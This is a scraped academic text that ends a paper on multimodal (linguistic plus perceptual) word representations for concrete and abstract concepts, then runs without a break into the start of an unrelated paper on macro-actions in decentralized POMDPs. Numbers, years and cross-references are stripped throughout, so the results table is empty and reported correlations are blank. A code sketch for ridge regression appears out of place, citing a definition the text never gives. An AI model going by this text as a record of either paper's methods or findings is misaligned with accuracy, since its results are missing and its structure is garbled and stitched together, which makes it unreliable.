weighted gram matrix combination the method we propose as an alternative means of fusing linguistic and extra-linguistic information is weighted gram matrix combination, which derives from an information combination technique applied to verb clustering by reichart and korhonen ( ). for a set of concepts $c = \{c_1, \ldots, c_n\}$ with representations $\{r_1, \ldots, r_n\}$, the method involves creating an n × n weighted gram matrix l in which

\[ l_{ij} = s(r_i, r_j) \cdot \phi(r_i) \cdot \phi(r_j). \]

here, s is again a similarity function (we use cosine similarity), and φ(r) is the quality score of r. the quality scoring function φ can be any mapping $\mathbb{R}^n \to \mathbb{R}$ that reflects the importance of a concept relative to other concepts in c. in the present context, we follow reichart and korhonen ( ) in defining a quality score φ as the average cosine similarity of a concept with all other concepts in c:

\[ \phi(r_j) = \frac{1}{n} \sum_{i=1}^{n} s(r_i, r_j). \]

for $c_j \in c$, the matrix l then encodes a scalar projection of $r_j$ onto the other members $r_{i \le n}$, weighted by their quality. each word representation in the set is thus mapped into a new space of dimension n determined by the concepts in c. converting concept representations to weighted gram matrix form has several advantages in the present context.
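as a minimal sketch of the ridge-regression propagation defined above, using scikit-learn's ridge estimator purely for illustration (the regularization strength and the array layouts are assumptions, not the paper's settings):

```python
# illustrative ridge propagation: map concrete-noun linguistic vectors to their
# perceptual features, then apply the learned maps to abstract nouns and verbs.
from sklearn.linear_model import Ridge

def propagate_ridge(concrete_linguistic, concrete_perceptual, target_linguistic, alpha=1.0):
    """concrete_linguistic: (n_concrete, n_l) array; concrete_perceptual: (n_concrete, n_p) array;
    target_linguistic: (n_targets, n_l) array of abstract nouns / verbs.
    returns an (n_targets, n_p) array of quasi-perceptual representations."""
    model = Ridge(alpha=alpha)
    model.fit(concrete_linguistic, concrete_perceptual)   # multi-output fit
    return model.predict(target_linguistic)
```

fitting one multi-output ridge model with a shared penalty is equivalent to learning the $n_p$ functions $f_i$ independently, since the penalized squared-error objective decomposes across output features.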
the first of these advantages is that, both when evaluating and applying semantic representations, we generally require models to determine relations between concepts relative to others. we might, for instance, require close associates of a given word, a selection of potential synonyms, or the two most similar search queries in a given set. this relative nature of semantics is reflected by projecting representations into a space defined by the set of concepts themselves, rather than low-level features. it is also captured by the quality weighting, which lends primacy to concept dimensions that are central to the space.

second, mapping representations of different dimension into vector spaces of equal dimension results in dense representations of equal dimension for each modality. this naturally lends equal weighting or status to each modality and resolves any issues of representation sparsity. in addition, the dimension equality in particular enables a wider range of mathematical operations for combining information sources. here, we follow reichart and korhonen ( ) in taking the product of the linguistic and perceptual weighted gram matrices l and p, producing a new matrix containing fused representations for each concept: $m = lppl$. by taking the composite product lppl rather than lp or pl, m is symmetric and no ad hoc status is conferred to one modality over the other.

figure : additive change in spearman's ρ when representations acquired from particular classes of linguistic features (lexical, pos, grammatical) are combined with (actual or inferred) perceptual representations, shown separately for concrete nouns, abstract nouns (jj), concrete verbs (jj) and abstract verbs (jj). perceptual representations are derived from either the mcrae dataset, the esp-game dataset or both (concatenated). for concepts other than concrete nouns, perceptual information is propagated using the johns and jones (jj) method, and combined with simple concatenation.

. results

the experiments in this section were designed to address the three questions specified in section : ( ) which information sources are important for acquiring word concepts of different types? ( ) can perceptual information be propagated from concrete to abstract concepts? ( ) what is the best way to combine the information from the different sources?

question ( ) to build on insights from section , we first examined how perceptual input interacts with the three classes of linguistic features defined there. figure shows the additive difference in correlation between (i) models in which perceptual and particular linguistic features are concatenated and (ii) models based on just the linguistic features.

for concrete nouns and concrete verbs, (actual or inferred) perceptual information was beneficial in almost all cases. the largest improvement for both concept types was over grammatical features, achieved by including only the mcrae data. the signals from this perceptual input and the grammatical features clearly reflect complementary aspects of the meaning of these concepts.
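to make the combination step concrete, a minimal sketch of the weighted gram matrix construction and the composite product $m = lppl$ defined above (array-based and purely illustrative, not the authors' implementation):

```python
# illustrative weighted gram matrix combination of two modalities.
import numpy as np

def weighted_gram(reps):
    """reps: (n_concepts, dim) array for one modality."""
    unit = reps / np.linalg.norm(reps, axis=1, keepdims=True)
    sims = unit @ unit.T                        # pairwise cosine similarities s(r_i, r_j)
    quality = sims.mean(axis=1)                 # phi: mean similarity to the other concepts
    return sims * np.outer(quality, quality)    # l_ij = s(r_i, r_j) * phi(r_i) * phi(r_j)

def combine(linguistic, perceptual):
    l = weighted_gram(linguistic)
    p = weighted_gram(perceptual)
    return l @ p @ p @ l                        # composite product m = lppl
```

because l and p are symmetric, the composite product lppl is symmetric as well, which is the property motivating this form over lp or pl.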
returning to figure , we hypothesize that grammatical features (and pos features, which also perform strongly in this combination) confer information to concrete representations about the function and mutual interaction of concepts (the most 'relational' aspects of their meaning (gentner, )) which complements the more intrinsic properties conferred by perceptual features.

for abstract concepts, it is perhaps unsurprising that the overall contribution of perceptual information was smaller. indeed, combining linguistic and perceptual information actually harmed performance on abstract verbs in all cases. for these concepts, the inferred perceptual features seem to obscure or contradict some of the information conveyed in the linguistic representations.

while the mcrae data was clearly the most valuable source of perceptual input for concrete nouns and concrete verbs, for abstract nouns the combination of esp-game and mcrae data was most informative. both inspection of the data and cognitive theories (rosch et al., ) suggest that entities identified in scenes, as in the esp-game dataset, generally correspond to a particular (basic) level of the conceptual hierarchy. the esp-game data reflects relations between these basic-level concepts in the world, whereas the mcrae data typically describes their (intrinsic) properties. together, these sources seem to combine information on the properties of, and relations between, concepts in a way that particularly facilitates the learning of abstract nouns.

  model         all nouns   conc. nouns†   abs. nouns   all verbs   conc. verbs   abs. verbs
  linguistic
  (jj)+concat
  (jj)+cca
  (jj)+wgm
  rr+concat
  rr+cca
  rr+wgm
  lr+
table : performance of different methods of information propagation (jj = johns and jones, rr = ridge regression, lr = linear regression) and combination (concat = concatenation, cca = canonical correlation analysis, wgm = weighted gram matrix multiplication) across evaluation sets. values are spearman's ρ correlation with usf scores (left hand side of columns) and wordnet path similarity (right hand side). for the lr baseline we only report the highest score across the three combination types. † no propagation takes place for concrete nouns; this column reflects the performance of combination methods only.

question ( ) the performance of different methods of information propagation and combination is presented in table . the underlying linguistic representations in this case contained all three distributional feature classes. for more robust conclusions, in addition to the usf gold-standard we also measured the correlation between model output and the wordnet path similarity of words in our evaluation pairs (other widely-used evaluation gold-standards, such as wordsim and the men dataset, do not contain a sufficient number of abstract concepts for the current purpose). the path similarity between words $w_1$ and $w_2$ is the shortest distance between synsets of $w_1$ and $w_2$ in the wordnet taxonomy (fellbaum, ), which correlates significantly with human judgements of concept similarity (pedersen et al., ).

the correlations with the usf data (left hand column, table ) of our linguistic-only models (ρ = . − . ) and best performing multi-modal models (on both concrete nouns, ρ = . , and more abstract concepts, ρ = . − . ) were higher than the best comparable models described elsewhere (feng and lapata, ; silberer and lapata, ; silberer et al., ). (feng and lapata ( ) report ρ = . for language-only and . for multi-modal models evaluated on usf over concrete and abstract concepts. silberer and lapata ( ) report ρ = . (language-only) and . (multi-modal) over concrete nouns.)
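for the wordnet path-similarity gold standard used above, a small sketch via nltk's wordnet interface; taking the maximum over synset pairs is a common convention and an assumption here rather than necessarily the authors' exact choice:

```python
# illustrative wordnet path similarity between two words.
from nltk.corpus import wordnet as wn

def path_similarity(word1, word2, pos=None):
    scores = [s1.path_similarity(s2)
              for s1 in wn.synsets(word1, pos=pos)
              for s2 in wn.synsets(word2, pos=pos)]
    scores = [s for s in scores if s is not None]
    return max(scores) if scores else None

# e.g. path_similarity('cup', 'mug', pos=wn.NOUN)
```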
this comparison confirms both that the underlying linguistic space is of high quality and that the esp and mcrae perceptual input is similarly or more informative than the input applied in previous work.

consistent with previous studies, adding perceptual input improved the quality of concrete noun representations as measured against both usf and path similarity gold-standards. further, effective information propagation was indeed possible for both abstract nouns (usf evaluation) and concrete verbs (both evaluations). interestingly, however, this was not the case for abstract verbs, for which no mix of propagation and combination methods produced an improvement on the linguistic-only model on either evaluation set. indeed, as shown in figure , no type of perceptual input generated an improvement in abstract verb representations, regardless of the underlying class of linguistic features.

this result underlines the link between concreteness, cognition and perception proposed in the psychological literature. more practically, it shows that concreteness can determine if propagation of perceptual input will be effective and, if so, the potential degree of improvement over text-only models.

turning to means of propagation, both the johns and jones method and ridge regression outperformed the linear regression baseline on the majority of concept types in our evaluation. across the five sets and ten evaluations on which propagation takes place (all nouns, abstract nouns, all verbs, abstract verbs and concrete verbs), ridge regression performed more robustly, achieving the best performance on six evaluation sets compared to two for the johns and jones method.

question ( ) weighted gram matrix multiplication (ρ = . on usf and ρ = . on path similarity) outperformed both simple vector concatenation (ρ = . and ρ = . ) and cca (ρ = . and ρ = . ) on concrete nouns. in the case of both abstract nouns and concrete verbs, however, the most effective means of combining quasi-perceptual information with linguistic representations was concatenation (abstract nouns, ρ = . and ρ = . , concrete verbs, ρ = . and ρ = . ). one evident drawback of multiplicative methods such as weighted gram matrix combination is the greater inter-dependence of the information sources; a weak signal from one modality can undermine the contribution of the other modality. we hypothesize that this underlies the comparatively poor performance of the method on verbs and abstract nouns, as the perceptual input for concrete nouns is clearly a richer information source than the propagated features of more abstract concepts.

conclusion

motivated by the inherent difference between abstract and concrete concepts and the observation that abstract words occur more frequently in language, in this paper we have addressed the question of whether multi-modal models can enhance semantic representations of both concept types.

in section , we demonstrated that different information sources are important for acquiring concrete and abstract noun and verb concepts.
within the lin- guistic modality, while lexical features are informa- tive for all concept types, syntactic features are only significantly informative for abstract concepts. in contrast, in section we observed that per- ceptual input is a more valuable information source for concrete concepts than abstract concepts. nev- ertheless, perceptual input can be effectively prop- agated from concrete nouns to enhance representa- tions of both abstract nouns and concrete verbs. in- for these comparisons, the optimal combination method is selected in each case. deed, conceptual concreteness appears to determine the degree to which perceptual input is beneficial, since representations of abstract verbs, the most ab- stract concepts in our experiments, were actually de- graded by this additional information. one impor- tant contribution of this work is therefore an insight into when multi-modal models should or should not aim to combine and/or propagate perceptual input to ensure that optimal representations are learned. in this respect, our conclusions align with the findings of kiela and hill ( ), who take an explicitly vi- sual approach to resolving the same question. various methods for propagating and combining perceptual information with linguistic input were presented. we proposed ridge regression for in- ferring perceptual representations for abstract con- cepts, which proved more robust than alternatives across the range of concept types. this approach is particularly simple to implement, since it is based on an established statistical prodedure. in addition, we introduced weighted gram matrix combination for combining representations from distinct modalities of differing sparsity and dimension. this method produces the highest quality composite representa- tions for concrete nouns, where both modalities rep- resent high quality information sources. overall, our results demonstrate that the potential practical benefits of multi-modal models extend be- yond concrete domains into a significant proportion of the lexical concepts found in language. in fu- ture work we aim to extend our experiments to con- cept types such as adjectives and adverbs, and to de- velop models that further improve the propagation and combination of extra-linguistic input. moreover, while we cannot draw definitive con- clusions about human language processing, the ef- fectiveness of the methods presented in this paper offer tentative support for the idea that even ab- stract concepts are grounded in the perceptual sys- tem (barsalou et al., ). as such, it may be that, even in the more abstract cases of human communi- cation, we find ways to see what people mean pre- cisely by finding ways to see what they mean. acknowledgements we thank the royal society and st john’s college for their support. references mark andrews, gabriella vigliocco, and david vinson. . integrating experiential and distributional data to learn semantic representations. psychological re- view, ( ): . marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computational linguis- tics. lawrence w barsalou, w kyle simmons, aron k bar- bey, and christine d wilson. . grounding conceptual knowledge in modality-specific systems. trends in cognitive sciences, ( ): – . 
jeffrey r binder, chris f westbury, kristen a mckier- nan, edward t possing, and david a medler. . distinct brain systems for processing concrete and ab- stract concepts. journal of cognitive neuroscience, ( ): – . elia bruni, gemma boleda, marco baroni, and nam- khanh tran. . distributional semantics in tech- nicolor. in proceedings of the th annual meet- ing of the association for computational linguistics: long papers-volume , pages – . association for computational linguistics. elia bruni, nam khanh tran, and marco baroni. . multimodal distributional semantics. journal of arti- ficial intelligence research, : – . jia deng, wei dong, richard socher, li-jia li, kai li, and li fei-fei. . imagenet: a large-scale hier- archical image database. in computer vision and pat- tern recognition, . cvpr , pages – . ieee. katrin erk and sebastian padó. . a structured vec- tor space model for word meaning in context. in pro- ceedings of the conference on empirical methods in natural language processing, pages – . asso- ciation for computational linguistics. christiane fellbaum. . wordnet. wiley online li- brary. yansong feng and mirella lapata. . visual infor- mation in semantic representation. in human lan- guage technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – . association for computational linguistics. vittorio gallese and george lakoff. . the brain’s concepts: the role of the sensory-motor system in con- ceptual knowledge. cognitive neuropsychology, ( - ): – . dedre gentner and arthur b markman. . structure mapping in analogy and similarity. american psychol- ogist, ( ): . dedre gentner. . on relational meaning: the ac- quisition of verb meaning. child development, pages – . daniel gildea and daniel jurafsky. . automatic la- beling of semantic roles. computational linguistics, ( ): – . yoav goldberg and jon orwant. . a dataset of syntactic-ngrams over time from a very large corpus of english books. in second joint conference on lexical and computational semantics, association for com- putational linguistics, pages – . association for computational linguistics. thomas l griffiths, mark steyvers, and joshua b tenen- baum. . topics in semantic representation. psy- chological review, ( ): . david r hardoon, sandor szedmak, and john shawe- taylor. . canonical correlation analysis: an overview with application to learning methods. neu- ral computation, ( ): – . zellig harris. . distributional structure. word, ( ): – . felix hill, anna korhonen, and christian bentz. . a quantitative empirical analysis of the ab- stract/concrete distinction. cognitive science. eric h huang, richard socher, christopher d manning, and andrew y ng. . improving word representa- tions via global context and multiple word prototypes. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: long papers- volume , pages – . association for computa- tional linguistics. sabine schulte im walde. . experiments on the automatic induction of german semantic verb classes. computational linguistics, ( ): – . brendan t johns and michael n jones. . perceptual inference through global lexical similarity. topics in cognitive science, ( ): – . colin kelly, barry devereux, and anna korhonen. . acquiring human-like feature-based conceptual repre- sentations from corpora. in proceedings of the naacl hlt first workshop on computational neurolin- guistics, pages – . association for computational linguistics. douwe kiela and felix hill. . 
improving multi- modal representations using image dispersion: why less is sometimes more. in proceedings of acl , baltimore. association for computational linguistics. karin kipper, anna korhonen, neville ryant, and martha palmer. . a large-scale classification of english verbs. language resources and evaluation, ( ): – . thomas k landauer and susan t dumais. . a so- lution to plato’s problem: the latent semantic analysis theory of acquisition, induction, and representation of knowledge. psychological review, ( ): . geoffrey leech, roger garside, and michael bryant. . claws : the tagging of the british national cor- pus. in proceedings of the th conference on compu- tational linguistics-volume , pages – . associ- ation for computational linguistics. chee wee leong and rada mihalcea. . going be- yond text: a hybrid image-text approach for measur- ing word relatedness. in ijcnlp, pages – . christopher d manning. . part-of-speech tagging from % to %: is it time for some linguistics? in computational linguistics and intelligent text pro- cessing, pages – . springer. arthur b markman and edward j wisniewski. . similar and different: the differentiation of basic- level categories. journal of experimental psychology: learning, memory, and cognition, ( ). ken mcrae, george s cree, mark s seidenberg, and chris mcnorgan. . semantic feature production norms for a large set of living and non-living things. behavior research methods, ( ): – . raymond h myers. . classical and modern regres- sion with applications, volume . duxbury press bel- mont, ca. douglas l nelson, cathy l mcevoy, and thomas a schreiber. . the university of south florida free association, rhyme, and word fragment norms. be- havior research methods, instruments, & computers, ( ): – . allan paivio. . dual coding theory: retrospect and current status. canadian journal of psychology/revue canadienne de psychologie, ( ): . ted pedersen, siddharth patwardhan, and jason miche- lizzi. . wordnet:: similarity: measuring the relat- edness of concepts. in demonstration papers at hlt- naacl , pages – . association for computa- tional linguistics. roi reichart and anna korhonen. . improved lexical acquisition through dpp-based verb clustering. in proceedings of the conference of the association for computational linguistics (acl). association for computational linguistics. stephen roller and sabine schulte im walde. . a multimodal lda model integrating textual, cognitive and visual modalities. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , seattle, wash- ington, usa, october. association for computational linguistics. eleanor rosch, carolyn b mervis, wayne d gray, david m johnson, and penny boyes-braem. . basic objects in natural categories. cognitive psychol- ogy, ( ): – . gideon rosen. . nominalism, naturalism, epis- temic relativism. noûs, (s ): – . magnus sahlgren. . the word-space model: us- ing distributional analysis to represent syntagmatic and paradigmatic relations between words in high- dimensional vector spaces. ph.d. thesis, stockholm. paula j schwanenflugel and edward j shoben. . differential context effects in the comprehension of abstract and concrete verbal materials. journal of ex- perimental psychology: learning, memory, and cog- nition, ( ): . carina silberer and mirella lapata. . grounded models of semantic representation. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – . 
asso- ciation for computational linguistics. carina silberer, vittorio ferrari, and mirella lapata. . models of semantic representation with visual attributes. in proceedings of the th annual meet- ing of the association for computational linguistics, sofia, bulgaria. peter d turney, patrick pantel, et al. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ): – . tim van de cruys, laura rimell, thierry poibeau, anna korhonen, et al. . multiway tensor factorization for unsupervised lexical acquisition. coling : technical papers, pages – . luis von ahn and laura dabbish. . labeling im- ages with a computer game. in proceedings of the sigchi conference on human factors in computing systems, pages – . acm. journal of artificial intelligence research ( ) - submitted / ; published / modeling and planning with macro-actions in decentralized pomdps christopher amato camato@ccs.neu.edu khoury college of computer sciences, northeastern university boston, ma usa george konidaris gdk@cs.brown.edu department of computer science, brown university providence, ri usa leslie p. kaelbling lpk@csail.mit.edu mit computer science and artificial intelligence laboratory cambridge, ma usa jonathan p. how jhow@mit.edu mit laboratory for information and decision systems cambridge, ma usa abstract decentralized partially observable markov decision processes (dec-pomdps) are gen- eral models for decentralized multi-agent decision making under uncertainty. however, they typically model a problem at a low level of granularity, where each agent’s actions are primitive operations lasting exactly one time step. we address the case where each agent has macro-actions: temporally extended actions that may require different amounts of time to execute. we model macro-actions as options in a dec-pomdp, focusing on actions that depend only on information directly available to the agent during execution. therefore, we model systems where coordination decisions only occur at the level of deciding which macro-actions to execute. the core technical difficulty in this setting is that the options chosen by each agent no longer terminate at the same time. we extend three leading dec- pomdp algorithms for policy generation to the macro-action case, and demonstrate their effectiveness in both standard benchmarks and a multi-robot coordination problem. the results show that our new algorithms retain agent coordination while allowing high-quality solutions to be generated for significantly longer horizons and larger state-spaces than pre- vious dec-pomdp methods. furthermore, in the multi-robot domain, we show that, in contrast to most existing methods that are specialized to a particular problem class, our approach can synthesize control policies that exploit opportunities for coordination while balancing uncertainty, sensor information, and information about other agents. . introduction the dec-pomdp (bernstein, givan, immerman, & zilberstein, ; oliehoek & amato, ) is a general framework for decentralized sequential decision-making under uncertainty and partial observability. dec-pomdps model problems where a team of agents shares the same objective function, but where each individual agent can only make noisy, partial ob- servations of the environment. solution methods for dec-pomdps aim to produce policies c© ai access foundation. all rights reserved. 
amato, konidaris, kaelbling & how that optimize reward while considering uncertainty in action outcomes, sensors, and infor- mation about the other agents. although much research has been conducted on solution methods for dec-pomdps, solving large instances remains intractable. advances have been made in optimal algorithms (see, for example, amato, chowdhary, geramifard, ure, & kochenderfer, ; amato, dibangoye, & zilberstein, ; aras, dutech, & charpillet, ; boularias & chaib- draa, ; dibangoye, amato, buffet, & charpillet, ; oliehoek, spaan, amato, & whiteson, ; dibangoye, amato, buffet, & charpillet, ), but most approaches that scale well make very strong assumptions about the domain (e.g., assuming a large amount of independence between agents) (dibangoye, amato, doniec, & charpillet, ; melo & veloso, ; nair, varakantham, tambe, & yokoo, ) and/or have no guarantees about solution quality (oliehoek, whiteson, & spaan, ; seuken & zilberstein, b; velagapudi, varakantham, sycara, & scerri, ). one reason for this intractability is that actions are modeled as primitive (low-level) operations that last exactly one time step. the length of a single step can be adjusted (trading off solution quality for horizon length), but is always assumed to be the same for all agents. this allows synchronized action selection, but also requires reasoning about action selection and coordination at every time step. in single-agent (i.e., mdp) domains, hierarchical approaches to learning and planning (barto & mahadevan, ), exemplified by the options framework (sutton, precup, & singh, ), have explored using higher-level, temporally extended macro-actions (or op- tions ) to represent and solve problems, leading to significant performance improvements in planning (silver & ciosek, ; sutton et al., ). we now extend these ideas to the multi-agent case by introducing a dec-pomdp formulation with macro-actions modeled as options. the primary technical challenge here is that decision-making is no longer syn- chronized: each agent’s options must be selected, and may complete, at different times. to permit coordination, agents must use their knowledge of option policies to reason about the progress of other agents and their impact on the world. the use of macro-actions in the multi-agent case can incorporate the benefits of the single agent case, such as simpler and more efficient modeling of real systems (e.g., robots with actions that execute predefined controllers) (stone, sutton, & kuhlmann, ), more efficient planning (sutton et al., ), skill transfer (konidaris & barto, ), and skill- specific abstractions (konidaris & barto, ; dietterich, ). additional benefits can be gained by exploiting known structure in the multi-agent problem. for instance, in some cases macro-actions may only depend on locally observable information. one example is a robot navigating to a waypoint in a security patrol application. only local information is required for navigation, but choosing which waypoint to navigate to next requires reason- ing about the location and state of all the other robots. macro-actions with independent execution allow coordination decisions to be made only when necessary (i.e., when choosing macro-actions) rather than at every time step. furthermore, macro-actions can build on other macro-actions, allowing hierarchical planning. the resulting macro-action formulation allows asynchronous decision-making using actions with varying time durations. 
we therefore focus on the case where the agents are given local options that depend only on information locally observable to the agent during execution. our results show that high-quality solutions can be found for a typical dec-pomdp benchmark as well as large problems that traditional dec-pomdp methods cannot solve: a four agent meeting-in-a- modeling and planning with macro-actions in decentralized pomdps grid problem and a domain based on robots navigating among movable obstacles (stilman & kuffner, ). our macro-action-based methods can scale well in terms of the problem horizon and domain variables, but do not directly target scalability in terms of the number of agents (although such extensions are possible in the future). incorporating macro-actions into dec-pomdps results in a scalable algorithmic framework for generating solutions for a wide range of probabilistic multi-agent systems. one important application area for our approach is multi-robot systems. for single robots, automatic planning systems provide a flexible general-purpose strategy for con- structing plans given high-level declarative domain specifications, even in the presence of substantial stochasticity and partial observability (thrun, burgard, & fox, ). by in- corporating macro-actions into dec-pomdps, we show that this strategy can be effectively extended to multi-robot systems: our methods naturally bridge dec-pomdps and multi- robot coordination, allowing principled decentralized methods to be applied to real domains. to solidify this bridge, we describe a process for creating a multi-robot macro-action dec- pomdp (macdec-pomdp) model, solving it, and using the solution to produce a set of executable smach (bohren, ) finite-state machine task controllers. our methods al- low automatic off-line construction of robust multi-robot policies that support coordinated actions—including generating communication strategies that exploit the environment to share information critical to achieving the group’s overall objective. . background we now describe the dec-pomdp and options frameworks, upon which our work is based. . decentralized partially-observable markov decision processes dec-pomdps (bernstein et al., ) generalize pomdps (kaelbling, littman, & cas- sandra, ) and mdps (puterman, ) to the multi-agent, decentralized setting. as depicted in figure , dec-pomdps model a team of agents that must cooperate to solve some task by receiving local observations and individually selecting and executing actions over a sequence of time steps. the agents share a single reward function that specifies their objective, but which is not typically observed during execution. execution is decentralized because each agent must select its own action at each time step, without knowledge of the actions chosen or observations received by the other agents. finally, the problem is partially observable because, while the formalism assumes that there exists a markovian state at each time step, the agents do not have access to it. instead, each agent receives a separate observation at each time step, which reflects its own partial and local view of the world. more formally, a dec-pomdp is defined by a tuple 〈i,s,{ai},t,r,{Ωi},o,h〉, where: • i is a finite set of agents. • s is a finite set of states with designated initial state distribution b . • ai is a finite set of actions for each agent i with a = ×iai the set of joint actions. . pomdps are dec-pomdps where there is only one agent or the decision-making by the agents is centralized. . 
mdps are pomdps where the state is fully observable.

figure : an n-agent dec-pomdp. each agent i receives observations $o_i$ and executes actions $a_i$; all agents receive a single collective reward r.

• t is a state transition probability function, t : s × a × s → [0, 1], that specifies the probability of transitioning from state s ∈ s to s′ ∈ s when actions ~a ∈ a are taken by the agents. hence, t(s,~a,s′) = pr(s′|~a,s).
• r is a reward function: r : s × a → ℝ, giving the immediate reward for being in state s ∈ s and taking actions ~a ∈ a.
• $\Omega_i$ is a finite set of observations for each agent, i, with $\Omega = \times_i \Omega_i$ the set of joint observations.
• o is an observation probability function: o : Ω × a × s → [0, 1], the probability of the agents receiving observations ~o ∈ Ω given actions ~a ∈ a were taken which results in state s′ ∈ s. hence o(~o,~a,s′) = pr(~o|~a,s′).
• h is the number of steps until the problem terminates, called the horizon.

note that while the actions and observations are factored with one factor per agent, the state—which represents the state of the whole system—need not be.

the solution to a dec-pomdp is a joint policy—a set of policies, one for each agent. in an mdp, a solution policy is represented directly as a mapping from states to actions. in partially observed settings, the agents do not have access to the state, and so must represent policies some other way. in pomdp settings it is typically possible to calculate the belief state—a probability distribution over the unobserved state—and represent the agent's policy as a mapping from belief state to actions. however, this is not possible in the dec-pomdp setting, because each agent would need access to the histories of all the other agents to calculate a (centralized) belief state. we therefore represent the history of each agent explicitly: the action-observation history for agent i, $h^a_i = (a^1_i, o^1_i, \ldots, a^t_i, o^t_i)$, represents the actions taken and observations received at each step (up to step t); the set of such histories for agent i is $H^a_i$. each agent's policies are then a function of the agent's history, and are either represented as a policy tree, where the vertices indicate actions to execute and the edges indicate transitions conditioned on an observation, or as a finite state controller which executes in a similar manner. an example of each is given in figure .

figure : a single agent's policy represented as (a) a policy tree and (b) a finite-state controller with initial state shown with a double circle.

the value of a joint policy, π, from state s is

\[ v^{\pi}(s) = \mathbb{E}\left[ \sum_{t=0}^{h-1} \gamma^{t} r(\vec{a}^{t}, s^{t}) \,\middle|\, s, \pi \right], \]

which represents the expected value of the immediate reward for the set of agents summed for each step of the problem given the action prescribed by the policy until the horizon is reached. in the finite-horizon case (which we consider in this paper), the discount factor, γ, is typically set to 1. an optimal policy beginning at state s is $\pi^{*}(s) = \arg\max_{\pi} v^{\pi}(s)$. the goal is to maximize the total cumulative reward, beginning at some initial distribution over states $b_0$. dec-pomdps have been widely studied and there are a number of significant advances in algorithms (e.g., see recent surveys amato et al., ; oliehoek, ; oliehoek & amato, ).
unfortunately, this generality comes at a cost: as mentioned above, dec-pomdps are typically infeasible to solve except for very small problems (bernstein et al., ). by contrast, we will show that by considering macro-actions, we retain the ability to coordinate while allowing high-quality solutions to be generated for significantly larger problems than would have been possible using other dec-pomdp-based methods. in this example, macro-actions could be navigating to a small or large box, pushing a box (alone or with another robot) to a destination, or communicating with another robot. (in fact, there is a common dec-pomdp benchmark that can be thought of as a simple version of a warehouse problem; seuken & zilberstein, a.) macro-actions are a natural model for the modular controllers often sequenced to obtain robot behavior. the macro-action approach leverages expert-designed or learned controllers for solving subproblems (e.g., navigating to a waypoint or grasping an object), bridging the gap between traditional robotics research and work on dec-pomdps. this approach has the potential to produce high-quality general solutions for real-world heterogeneous multi-robot coordination problems by automatically generating control and communication policies.

. the options framework

the options framework (sutton et al., ) provides methods for learning and planning using high-level actions, or options, in markov decision processes. in that setting, an option is defined by a tuple $m = (\beta_m, I_m, \pi_m)$, consisting of a stochastic termination condition, $\beta_m : S \to [0,1]$, which determines the probability with which an option ceases to execute in each state; an initiation set, $I_m \subset S$, which determines whether or not an option can be executed from a state; and a stochastic option policy, $\pi_m : S \times A \to [0,1]$, that maps states to action execution probabilities. an option describes a policy that an agent can choose to execute from any state in $I_m$, which results in the execution of policy $\pi_m$ until execution ceases according to $\beta_m$. the set of options is termed $M$. for example, in the warehouse example above, an option-based macro-action may be navigating to a waypoint. in that case, the initiation set may be all states (it is available anywhere), the option policy may be a policy that navigates the robot to the waypoint location from any location, and the termination condition may be the state that represents the waypoint location or a set of states within a given radius of the waypoint. there may also be terminal states for failure to reach the waypoint (e.g., states representing the robot getting stuck). the resulting problem is known as a semi-markov decision process, or smdp (sutton et al., ). note that we can create an option for a single-step action $a$ by defining $\pi_m(s,a) = \beta_m(s) = 1, \forall s$, and $I_m = S$. the options framework therefore generalizes the traditional mdp setting. the goal is to generate a (possibly stochastic) policy, $\mu : S \times M \to [0,1]$, that selects an appropriate option given the current state. the bellman equation for the smdp is

$V^\mu(s) = \sum_m \mu(s,m)\left[ R(s,m) + \sum_{s'} p(s'|s,m)\, V^\mu(s') \right]$,

where $p(s'|s,m) = \sum_k p^m_s(s',k)\,\gamma^k$, with $p^m_s(s',k)$ representing the probability that option $m$ will terminate in state $s'$ from state $s$ after $k$ steps, and $R(s,m)$ is an expectation over discounted rewards until termination, $\mathbb{E}[r_{t+1} + \gamma r_{t+2} + \ldots + \gamma^{k-1} r_{t+k}]$ (for executing option $m$ starting at time $t$ and terminating at time $t + k$).
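as an illustration of this bellman equation, the following sketch evaluates a fixed option policy when the option-level quantities $p(s'|s,m)$ and $R(s,m)$ are already available as arrays; how those quantities are obtained is discussed next. this is a minimal sketch under that assumption, not the authors' code.

import numpy as np

def smdp_policy_evaluation(mu, R, P, n_iters=100):
    """iteratively evaluate an option policy mu in an smdp (illustrative sketch).

    mu[s, m]    -- probability of choosing option m in state s
    R[s, m]     -- expected discounted reward of running option m from s until termination
    P[s, m, t]  -- discounted termination distribution sum_k p_s^m(t, k) * gamma^k
    """
    n_states = R.shape[0]
    V = np.zeros(n_states)
    for _ in range(n_iters):
        # V(s) = sum_m mu(s,m) [ R(s,m) + sum_s' p(s'|s,m) V(s') ]
        V = np.einsum("sm,sm->s", mu, R + np.einsum("smt,t->sm", P, V))
    return V

the fixed-point of this iteration is the option-policy value described above; a single-step action wrapped as an option reduces this to the ordinary mdp bellman equation.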
if the option policies and the lower-level mdp are known, these quantities can be calculated from the underlying models. if these quantities are not known, learning can be used to generate a solution. when the state is partially observable, these ideas can be directly transferred to the pomdp case. this can be done by representing the pomdp as a belief-state mdp. that is, given a current belief state, $b$, and a policy of option-based macro-actions, $\mu$, the value can be calculated as

$V^\mu(b) = \sum_m \mu(b,m)\left[ R(b,m) + \int_{b'} p(b'|b,m)\, V^\mu(b') \right]$,

